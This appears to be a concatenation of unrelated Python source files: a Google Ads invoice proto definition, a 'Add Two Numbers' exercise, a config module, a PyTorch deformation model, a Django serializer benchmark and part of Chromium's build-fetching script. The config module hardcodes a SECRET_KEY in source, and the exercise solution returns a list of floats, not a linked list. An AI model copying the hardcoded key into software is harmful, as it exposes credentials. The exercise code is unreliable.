Output only. A 12 digit ID used to identify
the payments profile associated with the billing
setup, e.g. "1234-5678-9012". It appears on the
invoice PDF as "Billing ID".
issue_date (str):
Output only. The issue date in yyyy-mm-dd
format. It appears on the invoice PDF as either
"Issue date" or "Invoice date".
due_date (str):
Output only. The due date in yyyy-mm-dd
format.
service_date_range (google.ads.googleads.v7.common.types.DateRange):
Output only. The service period date range of
this invoice. The end date is inclusive.
currency_code (str):
Output only. The currency code. All costs are
returned in this currency. A subset of the
currency codes derived from the ISO 4217
standard is supported.
adjustments_subtotal_amount_micros (int):
Output only. The pretax subtotal amount of
invoice level adjustments, in micros.
adjustments_tax_amount_micros (int):
Output only. The sum of taxes on the invoice
level adjustments, in micros.
adjustments_total_amount_micros (int):
Output only. The total amount of invoice
level adjustments, in micros.
regulatory_costs_subtotal_amount_micros (int):
Output only. The pretax subtotal amount of
invoice level regulatory costs, in micros.
regulatory_costs_tax_amount_micros (int):
Output only. The sum of taxes on the invoice
level regulatory costs, in micros.
regulatory_costs_total_amount_micros (int):
Output only. The total amount of invoice
level regulatory costs, in micros.
subtotal_amount_micros (int):
Output only. The pretax subtotal amount, in micros. This
equals the sum of the AccountBudgetSummary subtotal amounts,
Invoice.adjustments_subtotal_amount_micros, and
Invoice.regulatory_costs_subtotal_amount_micros. Starting
with v6, the Invoice.regulatory_costs_subtotal_amount_micros
is no longer included.
tax_amount_micros (int):
Output only. The sum of all taxes on the
invoice, in micros. This equals the sum of the
AccountBudgetSummary tax amounts, plus taxes not
associated with a specific account budget.
total_amount_micros (int):
Output only. The total amount, in micros. This equals the
sum of Invoice.subtotal_amount_micros and
Invoice.tax_amount_micros. Starting with v6,
Invoice.regulatory_costs_subtotal_amount_micros is also
added as it is no longer already included in
Invoice.tax_amount_micros.
corrected_invoice (str):
Output only. The resource name of the original invoice
corrected, wrote off, or canceled by this invoice, if
applicable. If ``corrected_invoice`` is set,
``replaced_invoices`` will not be set. Invoice resource
names have the form:
``customers/{customer_id}/invoices/{invoice_id}``
replaced_invoices (Sequence[str]):
Output only. The resource name of the original invoice(s)
being rebilled or replaced by this invoice, if applicable.
There might be multiple replaced invoices due to invoice
consolidation. The replaced invoices may not belong to the
same payments account. If ``replaced_invoices`` is set,
``corrected_invoice`` will not be set. Invoice resource
names have the form:
``customers/{customer_id}/invoices/{invoice_id}``
pdf_url (str):
Output only. The URL to a PDF copy of the
invoice. Users need to pass in their OAuth token
to request the PDF with this URL.
account_budget_summaries (Sequence[google.ads.googleads.v7.resources.types.Invoice.AccountBudgetSummary]):
Output only. The list of summarized account
budget information associated with this invoice.
"""
class AccountBudgetSummary(proto.Message):
r"""Represents a summarized account budget billable cost.
Attributes:
customer (str):
Output only. The resource name of the customer associated
with this account budget. This contains the customer ID,
which appears on the invoice PDF as "Account ID". Customer
resource names have the form:
``customers/{customer_id}``
customer_descriptive_name (str):
Output only. The descriptive name of the
account budget’s customer. It appears on the
invoice PDF as "Account".
account_budget (str):
Output only. The resource name of the account budget
associated with this summarized billable cost. AccountBudget
resource names have the form:
``customers/{customer_id}/accountBudgets/{account_budget_id}``
account_budget_name (str):
Output only. The name of the account budget.
It appears on the invoice PDF as "Account
budget".
purchase_order_number (str):
Output only. The purchase order number of the
account budget. It appears on the invoice PDF as
"Purchase order".
subtotal_amount_micros (int):
Output only. The pretax subtotal amount
attributable to this budget during the service
period, in micros.
tax_amount_micros (int):
Output only. The tax amount attributable to
this budget during the service period, in
micros.
total_amount_micros (int):
Output only. The total amount attributable to
this budget during the service period, in
micros. This equals the sum of the account
budget subtotal amount and the account budget
tax amount.
billable_activity_date_range (google.ads.googleads.v7.common.types.DateRange):
Output only. The billable activity date range
of the account budget, within the service date
range of this invoice. The end date is
inclusive. This can be different from the
account budget's start and end time.
"""
customer = proto.Field(proto.STRING, number=10, optional=True,)
customer_descriptive_name = proto.Field(
proto.STRING, number=11, optional=True,
)
account_budget = proto.Field(proto.STRING, number=12, optional=True,)
account_budget_name = proto.Field(
proto.STRING, number=13, optional=True,
)
purchase_order_number = proto.Field(
proto.STRING, number=14, optional=True,
)
subtotal_amount_micros = proto.Field(
proto.INT64, number=15, optional=True,
)
tax_amount_micros = proto.Field(proto.INT64, number=16, optional=True,)
total_amount_micros = proto.Field(
proto.INT64, number=17, optional=True,
)
billable_activity_date_range = proto.Field(
proto.MESSAGE, number=9, message=dates.DateRange,
)
resource_name = proto.Field(proto.STRING, number=1,)
id = proto.Field(proto.STRING, number=25, optional=True,)
type_ = proto.Field(
proto.ENUM, number=3, enum=invoice_type.InvoiceTypeEnum.InvoiceType,
)
billing_setup = proto.Field(proto.STRING, number=26, optional=True,)
payments_account_id = proto.Field(proto.STRING, number=27, optional=True,)
payments_profile_id = proto.Field(proto.STRING, number=28, optional=True,)
issue_date = proto.Field(proto.STRING, number=29, optional=True,)
due_date = proto.Field(proto.STRING, number=30, optional=True,)
service_date_range = proto.Field(
proto.MESSAGE, number=9, message=dates.DateRange,
)
currency_code = proto.Field(proto.STRING, number=31, optional=True,)
adjustments_subtotal_amount_micros = proto.Field(proto.INT64, number=19,)
adjustments_tax_amount_micros = proto.Field(proto.INT64, number=20,)
adjustments_total_amount_micros = proto.Field(proto.INT64, number=21,)
regulatory_costs_subtotal_amount_micros = proto.Field(
proto.INT64, number=22,
)
regulatory_costs_tax_amount_micros = proto.Field(proto.INT64, number=23,)
regulatory_costs_total_amount_micros = proto.Field(proto.INT64, number=24,)
subtotal_amount_micros = proto.Field(proto.INT64, number=33, optional=True,)
tax_amount_micros = proto.Field(proto.INT64, number=34, optional=True,)
total_amount_micros = proto.Field(proto.INT64, number=35, optional=True,)
corrected_invoice = proto.Field(proto.STRING, number=36, optional=True,)
replaced_invoices = proto.RepeatedField(proto.STRING, number=37,)
pdf_url = proto.Field(proto.STRING, number=38, optional=True,)
account_budget_summaries = proto.RepeatedField(
proto.MESSAGE, number=18, message=AccountBudgetSummary,
)
__all__ = tuple(sorted(__protobuf__.manifest))
|
py | b40367205074f45cadabfc94d4adcffbc58d332d | # Exercise: Add Two Numbers
# You are given two non-empty linked lists representing two non-negative integers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list.
# You may assume the two numbers do not contain any leading zero, except the number 0 itself.
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def addTwoNumbers(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
num1, num2 = 0, 0
cur1, cur2 = l1, l2
position = 1
while cur1:
num1 += (cur1.val * position)
cur1 = cur1.next
position *= 10
position = 1
while cur2:
num2 += (cur2.val * position)
cur2 = cur2.next
position *= 10
sum = num1 + num2
lst = []
position = 10
while sum > 0:
temp = sum % position
sum -= temp
lst.append(temp/(position/10))
position *= 10
if lst == []:
return [0]
else:
return lst
############################################
#### TO PRINT SOLUTIONS: ####
#### ####
############################################
# nums = [2, 7, 11, 15]
# target = 9
# solution = Solution()
# print(solution.twoSum(nums, target))
|
py | b403675937dcc488ece895a0dadb4e29eb6a057e | import pathlib
import yaml
SECRET_KEY = b'8gmb092bYf0ybnvBTgtkrVDtqTiaXQxRGKcx060W2bg='
BASE_DIR = pathlib.Path(__file__).parent
STATIC_DIR = BASE_DIR/'static'
TEMPLATES_DIR = STATIC_DIR/'templates'
config_path = BASE_DIR/'config.yaml'
def get_config(path):
with open(path) as file:
config = yaml.safe_load(file)
return config
config = get_config(config_path)
|
py | b403686d83d332dcbf103328425cdcbc2795ae91 | import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import tb_utils
import tb_manifold
import tb_tda
class tb_deformation_dirichlet(nn.Module):
def __init__(self, mesh_size, param_list=None, state_list=None):
""" Uses volume loss, sparsity loss, and continuity loss (motivated by dirichlet energy) to perform deformation.
Either provide param_list or precomputed state_list.
Args:
mesh_size (int): number of k points sampled along each axis.
param_list (list, optional): list of parameters of the form [t3, t4, [band index]]
state_list (list, optional): list of precomputed states.
"""
super().__init__()
if state_list is not None:
self.state_list = state_list
assert param_list is None, "provide either the param_list or the state_list, not both "
else:
assert param_list is not None, "provide either the param_list or the state_list"
param_list.append(mesh_size)
self.state_list = tb_utils.get_state_list(*param_list)
self.state_list = torch.tensor(np.array(self.state_list))
self.mesh_size = mesh_size
self.eulerangles_t = nn.Parameter(torch.zeros(3, self.mesh_size - 1))
self._init_params()
def _init_params(self):
nn.init.uniform_(self.eulerangles_t, -0.01, 0.01)
def deformation(self, eulerangles_t, state_t):
so3_t = torch.zeros((self.mesh_size - 1, 3, 3), dtype=torch.double)
deformed_t = torch.zeros_like(state_t)
so3_t[:, 0, 0] = torch.cos(eulerangles_t[0]) * torch.cos(eulerangles_t[2]) - torch.sin(eulerangles_t[0]) * torch.sin(eulerangles_t[2]) * torch.cos(eulerangles_t[1])
so3_t[:, 0, 1] = - torch.cos(eulerangles_t[0]) * torch.sin(eulerangles_t[2]) - torch.cos(eulerangles_t[1]) * torch.cos(eulerangles_t[2]) * torch.sin(eulerangles_t[0])
so3_t[:, 0, 2] = torch.sin(eulerangles_t[0]) * torch.sin(eulerangles_t[1])
so3_t[:, 1, 0] = torch.cos(eulerangles_t[2]) * torch.sin(eulerangles_t[0]) + torch.cos(eulerangles_t[0]) * torch.cos(eulerangles_t[1]) * torch.sin(eulerangles_t[2])
so3_t[:, 1, 1] = torch.cos(eulerangles_t[0]) * torch.cos(eulerangles_t[1]) * torch.cos(eulerangles_t[2]) - torch.sin(eulerangles_t[0]) * torch.sin(eulerangles_t[2])
so3_t[:, 1, 2] = - torch.cos(eulerangles_t[0]) * torch.sin(eulerangles_t[1])
so3_t[:, 2, 0] = torch.sin(eulerangles_t[1]) * torch.sin(eulerangles_t[2])
so3_t[:, 2, 1] = torch.cos(eulerangles_t[2]) * torch.sin(eulerangles_t[1])
so3_t[:, 2, 2] = torch.cos(eulerangles_t[1])
deformed_t[1:] = torch.matmul(so3_t, state_t[1:])
deformed_t[0] = state_t[0]
return deformed_t
def loss_v_s(self, state_t):
loss_v = 0.
loss_s = 0.
deformed_state = self.deformation(self.eulerangles_t, state_t)
for i in range(self.mesh_size - 1):
vol = torch.sqrt(torch.abs(1. - torch.abs(torch.matmul(deformed_state[i].view(1, 3), deformed_state[i + 1]))**2))
loss_v += vol
loss_s += vol**2
vol = torch.sqrt(torch.abs(1. - torch.abs(torch.matmul(deformed_state[-1].view(1, 3), deformed_state[0]))**2))
loss_v += vol
loss_s += vol**2
return loss_v, loss_s
def loss_so3(self, eulerangles_t, state_t, vol_loss):
""" note that eulerangles_t shorter than state_t by 1"""
deformed_state = self.deformation(eulerangles_t, state_t)
similarity = torch.zeros(self.mesh_size)
average_length = abs(vol_loss / self.mesh_size)
for i in range(self.mesh_size - 1):
similarity[i] = torch.exp(-torch.sqrt(torch.abs(1. - torch.abs(torch.matmul(deformed_state[i].view(1, 3), deformed_state[i + 1]))**2)) / average_length)
similarity[-1] = torch.exp(-(1. - torch.abs(torch.matmul(deformed_state[-1].view(1, 3), deformed_state[0]))**2) / average_length)
loss_so3 = torch.abs(eulerangles_t[:, 0]) * similarity[0] + torch.abs(eulerangles_t[:, -1]) * similarity[-1]
for i in range(self.mesh_size - 2):
loss_so3 += torch.abs(eulerangles_t[:, i] - eulerangles_t[:, i + 1]) * similarity[i + 1]
return torch.sum(loss_so3)
def find_deformation(self, n_loop, ratio=1.0, ratio_s=1.0, auto_ratio=True):
optimizer = torch.optim.Adam(self.parameters(), lr=0.01)
for n in range(n_loop):
if n < 10 and auto_ratio == True:
with torch.no_grad():
vol_loss, sparse_loss = self.loss_v_s(self.state_list)
dir_loss = self.loss_so3(self.eulerangles_t, self.state_list, vol_loss.item())
ratio_s = vol_loss.item() / sparse_loss.item()
ratio = vol_loss.item() / dir_loss.item()
if n % 10 == 0 and auto_ratio == True and n >= 10:
with torch.no_grad():
vol_loss, sparse_loss = self.loss_v_s(self.state_list)
dir_loss = self.loss_so3(self.eulerangles_t, self.state_list, vol_loss.item())
ratio_s = vol_loss.item() / sparse_loss.item()
if n == 10:
ratio = vol_loss.item() / dir_loss.item()
decay_rate = np.power(ratio, 0.1)
else:
ratio = max(ratio / decay_rate, 1.)
while ratio * dir_loss.item() / vol_loss.item() > 0.5:
ratio = ratio / 1.1
vol_loss, sparse_loss = self.loss_v_s(self.state_list)
dir_loss = self.loss_so3(self.eulerangles_t, self.state_list, vol_loss.item())
tot_loss = vol_loss + ratio * dir_loss + ratio_s * sparse_loss
optimizer.zero_grad()
tot_loss.backward()
optimizer.step()
def get_deformed_state(self):
with torch.no_grad():
learned_deformed_state = np.array(self.deformation(self.eulerangles_t, self.state_list))
return learned_deformed_state
def save_deformed_manifold(self, file_name_isomap, file_name_mds, n_components):
learned_deformed_state = self.get_deformed_state()
manifold = tb_manifold.tb_manifold(state_list=learned_deformed_state)
manifold.save_isomap(file_name_isomap, n_components=n_components)
manifold.save_mds(file_name_mds, n_components=n_components)
def save_deformed_manifold_persistence(self, file_name_persistence):
learned_deformed_state = self.get_deformed_state()
tda = tb_tda.tb_tda(state_list=learned_deformed_state)
tda.save_persistence(file_name_persistence)
def get_deformed_manifold_persistence(self):
learned_deformed_state = self.get_deformed_state()
tda = tb_tda.tb_tda(state_list=learned_deformed_state)
return tda.get_persistence()
if __name__ == "__main__":
trivial = tb_deformation_dirichlet(150, param_list=[1.0, -1.0, [0]])
trivial_manifold = tb_manifold.tb_manifold(state_list=trivial.get_deformed_state())
np.save('trivial_iso_pre', np.array(trivial_manifold.get_isomap_dim_list()))
np.save('trivial_mds_pre', np.array(trivial_manifold.get_mds_dim_list()))
trivial.save_deformed_manifold_persistence("figures_tb/deformed_dir_persistence_trivial_pre")
trivial.save_deformed_manifold("figures_tb/deformed_dir_isomap_trivial_pre", "figures_tb/deformed_dir_mds_trivial_pre", n_components=2)
trivial.find_deformation(3000)
trivial.save_deformed_manifold("figures_tb/deformed_dir_isomap_trivial", "figures_tb/deformed_dir_mds_trivial", n_components=2)
trivial.save_deformed_manifold_persistence("figures_tb/deformed_dir_persistence_trivial")
trivial_manifold = tb_manifold.tb_manifold(state_list=trivial.get_deformed_state())
np.save('trivial_iso', np.array(trivial_manifold.get_isomap_dim_list()))
np.save('trivial_mds', np.array(trivial_manifold.get_mds_dim_list()))
topological = tb_deformation_dirichlet(150, param_list=[1.0, 1.0, [0]])
topological_manifold = tb_manifold.tb_manifold(state_list=topological.get_deformed_state())
np.save('topological_iso_pre', np.array(topological_manifold.get_isomap_dim_list()))
np.save('topological_mds_pre', np.array(topological_manifold.get_mds_dim_list()))
topological.save_deformed_manifold_persistence("figures_tb/deformed_dir_persistence_topological_pre")
topological.save_deformed_manifold("figures_tb/deformed_dir_isomap_topological_pre", "figures_tb/deformed_dir_mds_topological_pre", n_components=2)
topological.find_deformation(3000)
topological.save_deformed_manifold("figures_tb/deformed_dir_isomap_topological", "figures_tb/deformed_dir_mds_topological", n_components=2)
topological.save_deformed_manifold_persistence("figures_tb/deformed_dir_persistence_topological")
topological_manifold = tb_manifold.tb_manifold(state_list=topological.get_deformed_state())
np.save('topological_iso', np.array(topological_manifold.get_isomap_dim_list()))
np.save('topological_mds', np.array(topological_manifold.get_mds_dim_list()))
|
py | b4036981d3fdeb95ed37cd6259deae0ae9b18032 | import os
import django
import timeit
import sys
sys.path.append(os.getcwd())
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings' # noqa
django.setup() # noqa
from rest_framework.serializers import Serializer, ModelSerializer
from rest_framework import fields
from tests.app import models
from tests.app.serializers import CategoryHierarchySerializer as CachedHierarchy
from django.db import connection
class UserSerializer(ModelSerializer):
class Meta:
model = models.User
fields = ('id', 'name')
class FilmCategorySerializer(ModelSerializer):
class Meta:
model = models.FilmCategory
fields = ('id', 'name')
class FilmSerializer(ModelSerializer):
uploaded_by = UserSerializer()
category = FilmCategorySerializer()
class Meta:
model = models.Film
fields = ('id', 'name', 'category', 'year', 'uploaded_by')
class CategoryHierarchySerializer(Serializer):
category = FilmCategorySerializer()
films = fields.SerializerMethodField()
categories = fields.SerializerMethodField()
def get_films(self, instance):
serializer = FilmSerializer(instance.films, many=True)
serializer.bind('*', self)
return serializer.data
def get_categories(self, instance):
serializer = self.__class__(instance.categories, many=True)
serializer.bind('*', self)
return serializer.data
def main():
user = models.User.objects.create(name='Bob')
top_category = models.FilmCategory.objects.create(name='All')
child_movies = models.FilmCategory.objects.create(
name='Child movies', parent_category=top_category)
cartoons = models.FilmCategory.objects.create(
name='Cartoons', parent_category=child_movies)
serious_stuff = models.FilmCategory.objects.create(
name='Serious', parent_category=top_category)
anime = models.FilmCategory.objects.create(
name='Anime', parent_category=serious_stuff)
object = models.CategoryHierarchy(
top_category,
categories=[
models.CategoryHierarchy(
child_movies,
categories=[
models.CategoryHierarchy(
cartoons,
films=[
models.Film.objects.create(name='Mickey Mouse',
year=1966,
uploaded_by=user,
category=cartoons)
for _ in range(10)
]
)
]
),
models.CategoryHierarchy(
serious_stuff,
categories=[
models.CategoryHierarchy(
anime,
films=[
models.Film.objects.create(name='Ghost in the shell',
year=1989,
uploaded_by=user,
category=anime)
for _ in range(10)
]
)
]
),
])
def simple_serialize():
return CategoryHierarchySerializer(object).data
def cached_serialize():
return CachedHierarchy(object).data
assert simple_serialize() == cached_serialize(), 'Result is wrong'
print('Model with recursion serializer: ',
timeit.timeit('simple_serialize()',
globals={'simple_serialize': simple_serialize},
number=500))
print('Cached model with recursion serializer: ',
timeit.timeit('cached_serialize()',
globals={'cached_serialize': cached_serialize},
number=500))
if __name__ == '__main__':
connection.creation.create_test_db()
main()
connection.creation.destroy_test_db()
|
py | b4036ac23fe376e6fdc0a4306112e3bc74cd6156 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module contains functions for fetching and extracting archived builds.
The builds may be stored in different places by different types of builders;
for example, builders on tryserver.chromium.perf stores builds in one place,
while builders on chromium.linux store builds in another.
This module can be either imported or run as a stand-alone script to download
and extract a build.
Usage: fetch_build.py <type> <revision> <output_dir> [options]
"""
import argparse
import errno
import logging
import os
import shutil
import sys
import zipfile
# Telemetry (src/tools/telemetry) is expected to be in the PYTHONPATH.
from telemetry.util import cloud_storage
import bisect_utils
# Possible builder types.
PERF_BUILDER = 'perf'
FULL_BUILDER = 'full'
ANDROID_CHROME_PERF_BUILDER = 'android-chrome-perf'
# Maximum time in seconds to wait after posting build request to the try server.
MAX_MAC_BUILD_TIME = 14400
MAX_WIN_BUILD_TIME = 14400
MAX_LINUX_BUILD_TIME = 14400
# Try server status page URLs, used to get build status.
PERF_TRY_SERVER_URL = 'http://build.chromium.org/p/tryserver.chromium.perf'
LINUX_TRY_SERVER_URL = 'http://build.chromium.org/p/tryserver.chromium.linux'
def GetBucketAndRemotePath(revision, builder_type=PERF_BUILDER,
target_arch='ia32', target_platform='chromium',
deps_patch_sha=None, extra_src=None):
"""Returns the location where a build archive is expected to be.
Args:
revision: Revision string, e.g. a git commit hash or SVN revision.
builder_type: Type of build archive.
target_arch: Architecture, e.g. "ia32".
target_platform: Platform name, e.g. "chromium" or "android".
deps_patch_sha: SHA1 hash which identifies a particular combination of
custom revisions for dependency repositories.
extra_src: Path to a script which can be used to modify the bisect script's
behavior.
Returns:
A pair of strings (bucket, path), where the archive is expected to be.
"""
logging.info('Getting GS URL for archive of builder "%s", "%s", "%s".',
builder_type, target_arch, target_platform)
build_archive = BuildArchive.Create(
builder_type, target_arch=target_arch, target_platform=target_platform,
extra_src=extra_src)
bucket = build_archive.BucketName()
remote_path = build_archive.FilePath(revision, deps_patch_sha=deps_patch_sha)
return bucket, remote_path
def GetBuilderNameAndBuildTime(builder_type=PERF_BUILDER, target_arch='ia32',
target_platform='chromium', extra_src=None):
"""Gets builder bot name and build time in seconds based on platform."""
logging.info('Getting builder name for builder "%s", "%s", "%s".',
builder_type, target_arch, target_platform)
build_archive = BuildArchive.Create(
builder_type, target_arch=target_arch, target_platform=target_platform,
extra_src=extra_src)
return build_archive.GetBuilderName(), build_archive.GetBuilderBuildTime()
def GetBuildBotUrl(builder_type=PERF_BUILDER, target_arch='ia32',
target_platform='chromium', extra_src=None):
"""Gets buildbot URL for a given builder type."""
logging.info('Getting buildbot URL for "%s", "%s", "%s".',
builder_type, target_arch, target_platform)
build_archive = BuildArchive.Create(
builder_type, target_arch=target_arch, target_platform=target_platform,
extra_src=extra_src)
return build_archive.GetBuildBotUrl()
class BuildArchive(object):
"""Represents a place where builds of some type are stored.
There are two pieces of information required to locate a file in Google
Cloud Storage, bucket name and file path. Subclasses of this class contain
specific logic about which bucket names and paths should be used to fetch
a build.
"""
@staticmethod
def Create(builder_type, target_arch='ia32', target_platform='chromium',
extra_src=None):
if builder_type == PERF_BUILDER:
return PerfBuildArchive(target_arch, target_platform)
if builder_type == FULL_BUILDER:
return FullBuildArchive(target_arch, target_platform)
if builder_type == ANDROID_CHROME_PERF_BUILDER:
try:
# Load and initialize a module in extra source file and
# return its module object to access android-chrome specific data.
loaded_extra_src = bisect_utils.LoadExtraSrc(extra_src)
return AndroidChromeBuildArchive(
target_arch, target_platform, loaded_extra_src)
except (IOError, TypeError, ImportError):
raise RuntimeError('Invalid or missing --extra_src. [%s]' % extra_src)
raise NotImplementedError('Builder type "%s" not supported.' % builder_type)
def __init__(self, target_arch='ia32', target_platform='chromium',
extra_src=None):
self._extra_src = extra_src
if bisect_utils.IsLinuxHost() and target_platform == 'android':
self._platform = 'android'
elif bisect_utils.IsLinuxHost() and target_platform == 'android-chrome':
self._platform = 'android-chrome'
elif bisect_utils.IsLinuxHost():
self._platform = 'linux'
elif bisect_utils.IsMacHost():
self._platform = 'mac'
elif bisect_utils.Is64BitWindows() and target_arch == 'x64':
self._platform = 'win64'
elif bisect_utils.IsWindowsHost():
self._platform = 'win'
else:
raise NotImplementedError('Unknown platform "%s".' % sys.platform)
def BucketName(self):
raise NotImplementedError()
def FilePath(self, revision, deps_patch_sha=None):
"""Returns the remote file path to download a build from.
Args:
revision: A Chromium revision; this could be a git commit hash or
commit position or SVN revision number.
deps_patch_sha: The SHA1 hash of a patch to the DEPS file, which
uniquely identifies a change to use a particular revision of
a dependency.
Returns:
A file path, which not does not include a bucket name.
"""
raise NotImplementedError()
def _ZipFileName(self, revision, deps_patch_sha=None):
"""Gets the file name of a zip archive for a particular revision.
This returns a file name of the form full-build-<platform>_<revision>.zip,
which is a format used by multiple types of builders that store archives.
Args:
revision: A git commit hash or other revision string.
deps_patch_sha: SHA1 hash of a DEPS file patch.
Returns:
The archive file name.
"""
base_name = 'full-build-%s' % self._PlatformName()
if deps_patch_sha:
revision = '%s_%s' % (revision, deps_patch_sha)
return '%s_%s.zip' % (base_name, revision)
def _PlatformName(self):
"""Return a string to be used in paths for the platform."""
if self._platform in ('win', 'win64'):
# Build archive for win64 is still stored with "win32" in the name.
return 'win32'
if self._platform in ('linux', 'android'):
# Android builds are also stored with "linux" in the name.
return 'linux'
if self._platform == 'mac':
return 'mac'
raise NotImplementedError('Unknown platform "%s".' % sys.platform)
def GetBuilderName(self):
raise NotImplementedError()
def GetBuilderBuildTime(self):
"""Returns the time to wait for a build after requesting one."""
if self._platform in ('win', 'win64'):
return MAX_WIN_BUILD_TIME
if self._platform in ('linux', 'android', 'android-chrome'):
return MAX_LINUX_BUILD_TIME
if self._platform == 'mac':
return MAX_MAC_BUILD_TIME
raise NotImplementedError('Unsupported Platform "%s".' % sys.platform)
def GetBuildBotUrl(self):
raise NotImplementedError()
class PerfBuildArchive(BuildArchive):
def BucketName(self):
return 'chrome-perf'
def FilePath(self, revision, deps_patch_sha=None):
return '%s/%s' % (self._ArchiveDirectory(),
self._ZipFileName(revision, deps_patch_sha))
def _ArchiveDirectory(self):
"""Returns the directory name to download builds from."""
platform_to_directory = {
'android': 'android_perf_rel',
'linux': 'Linux Builder',
'mac': 'Mac Builder',
'win64': 'Win x64 Builder',
'win': 'Win Builder',
}
assert self._platform in platform_to_directory
return platform_to_directory.get(self._platform)
def GetBuilderName(self):
"""Gets builder bot name based on platform."""
if self._platform == 'win64':
return 'win_x64_perf_bisect_builder'
elif self._platform == 'win':
return 'win_perf_bisect_builder'
elif self._platform == 'linux':
return 'linux_perf_bisect_builder'
elif self._platform == 'android':
return 'android_perf_bisect_builder'
elif self._platform == 'mac':
return 'mac_perf_bisect_builder'
raise NotImplementedError('Unsupported platform "%s".' % sys.platform)
def GetBuildBotUrl(self):
"""Returns buildbot URL for fetching build info."""
return PERF_TRY_SERVER_URL
class FullBuildArchive(BuildArchive):
def BucketName(self):
platform_to_bucket = {
'android': 'chromium-android',
'linux': 'chromium-linux-archive',
'mac': 'chromium-mac-archive',
'win64': 'chromium-win-archive',
'win': 'chromium-win-archive',
}
assert self._platform in platform_to_bucket
return platform_to_bucket.get(self._platform)
def FilePath(self, revision, deps_patch_sha=None):
return '%s/%s' % (self._ArchiveDirectory(),
self._ZipFileName(revision, deps_patch_sha))
def _ArchiveDirectory(self):
"""Returns the remote directory to download builds from."""
platform_to_directory = {
'android': 'android_main_rel',
'linux': 'chromium.linux/Linux Builder',
'mac': 'chromium.mac/Mac Builder',
'win64': 'chromium.win/Win x64 Builder',
'win': 'chromium.win/Win Builder',
}
assert self._platform in platform_to_directory
return platform_to_directory.get(self._platform)
def GetBuilderName(self):
"""Gets builder bot name based on platform."""
if self._platform == 'linux':
return 'linux_full_bisect_builder'
raise NotImplementedError('Unsupported platform "%s".' % sys.platform)
def GetBuildBotUrl(self):
"""Returns buildbot URL for fetching build info."""
return LINUX_TRY_SERVER_URL
class AndroidChromeBuildArchive(BuildArchive):
"""Represents a place where builds of android-chrome type are stored.
If AndroidChromeBuildArchive is used, it is assumed that the --extra_src
is a valid Python module which contains the module-level functions
GetBucketName and GetArchiveDirectory.
"""
def BucketName(self):
return self._extra_src.GetBucketName()
def _ZipFileName(self, revision, deps_patch_sha=None):
"""Gets the file name of a zip archive on android-chrome.
This returns a file name of the form build_product_<revision>.zip,
which is a format used by android-chrome.
Args:
revision: A git commit hash or other revision string.
deps_patch_sha: SHA1 hash of a DEPS file patch.
Returns:
The archive file name.
"""
if deps_patch_sha:
revision = '%s_%s' % (revision, deps_patch_sha)
return 'build_product_%s.zip' % revision
def FilePath(self, revision, deps_patch_sha=None):
return '%s/%s' % (self._ArchiveDirectory(),
self._ZipFileName(revision, deps_patch_sha))
def _ArchiveDirectory(self):
"""Returns the directory name to download builds from."""
return self._extra_src.GetArchiveDirectory()
def GetBuilderName(self):
"""Returns the builder name extra source."""
return self._extra_src.GetBuilderName()
def GetBuildBotUrl(self):
"""Returns buildbot URL for fetching build info."""
return self._extra_src.GetBuildBotUrl()
def BuildIsAvailable(bucket_name, remote_path):
"""Checks whether a build is currently archived at some place."""
logging.info('Checking existence: gs://%s/%s' % (bucket_name, remote_path))
try:
exists = cloud_storage.Exists(bucket_name, remote_path)
logging.info('Exists? %s' % exists)
return exists
except cloud_storage.CloudStorageError:
return False
def FetchFromCloudStorage(bucket_name, source_path, destination_dir):
"""Fetches file(s) from the Google Cloud Storage.
As a side-effect, this prints messages to stdout about what's happening.
Args:
bucket_name: Google Storage bucket name.
source_path: Source file path.
destination_dir: Destination file path.
Returns:
Local file path of downloaded file if it was downloaded. If the file does
not exist in the given bucket, or if there was an error while downloading,
None is returned.
"""
target_file = os.path.join(destination_dir, os.path.basename(source_path))
gs_url = 'gs://%s/%s' % (bucket_name, source_path)
try:
if cloud_storage.Exists(bucket_name, source_path):
logging.info('Fetching file from %s...', gs_url)
cloud_storage.Get(bucket_name, source_path, target_file)
if os.path.exists(target_file):
return target_file
else:
logging.info('File %s not found in cloud storage.', gs_url)
return None
except Exception as e:
logging.warn('Exception while fetching from cloud storage: %s', e)
if os.path.exists(target_file):
os.remove(target_file)
return None
def Unzip(file_path, output_dir, verbose=True):
"""Extracts a zip archive's contents into the given output directory.
This was based on ExtractZip from build/scripts/common/chromium_utils.py.
Args:
file_path: Path of the zip file to extract.
output_dir: Path to the destination directory.
verbose: Whether to print out what is being extracted.
Raises:
IOError: The unzip command had a non-zero exit code.
RuntimeError: Failed to create the output directory.
"""
_MakeDirectory(output_dir)
# On Linux and Mac, we use the unzip command because it handles links and
# file permissions bits, so achieving this behavior is easier than with
# ZipInfo options.
#
# The Mac Version of unzip unfortunately does not support Zip64, whereas
# the python module does, so we have to fall back to the python zip module
# on Mac if the file size is greater than 4GB.
mac_zip_size_limit = 2 ** 32 # 4GB
if (bisect_utils.IsLinuxHost() or
(bisect_utils.IsMacHost()
and os.path.getsize(file_path) < mac_zip_size_limit)):
unzip_command = ['unzip', '-o']
_UnzipUsingCommand(unzip_command, file_path, output_dir)
return
# On Windows, try to use 7z if it is installed, otherwise fall back to the
# Python zipfile module. If 7z is not installed, then this may fail if the
# zip file is larger than 512MB.
sevenzip_path = r'C:\Program Files\7-Zip\7z.exe'
if bisect_utils.IsWindowsHost() and os.path.exists(sevenzip_path):
unzip_command = [sevenzip_path, 'x', '-y']
_UnzipUsingCommand(unzip_command, file_path, output_dir)
return
_UnzipUsingZipFile(file_path, output_dir, verbose)
def _UnzipUsingCommand(unzip_command, file_path, output_dir):
"""Extracts a zip file using an external command.
Args:
unzip_command: An unzipping command, as a string list, without the filename.
file_path: Path to the zip file.
output_dir: The directory which the contents should be extracted to.
Raises:
IOError: The command had a non-zero exit code.
"""
absolute_filepath = os.path.abspath(file_path)
command = unzip_command + [absolute_filepath]
return_code = _RunCommandInDirectory(output_dir, command)
if return_code:
_RemoveDirectoryTree(output_dir)
raise IOError('Unzip failed: %s => %s' % (str(command), return_code))
def _RunCommandInDirectory(directory, command):
"""Changes to a directory, runs a command, then changes back."""
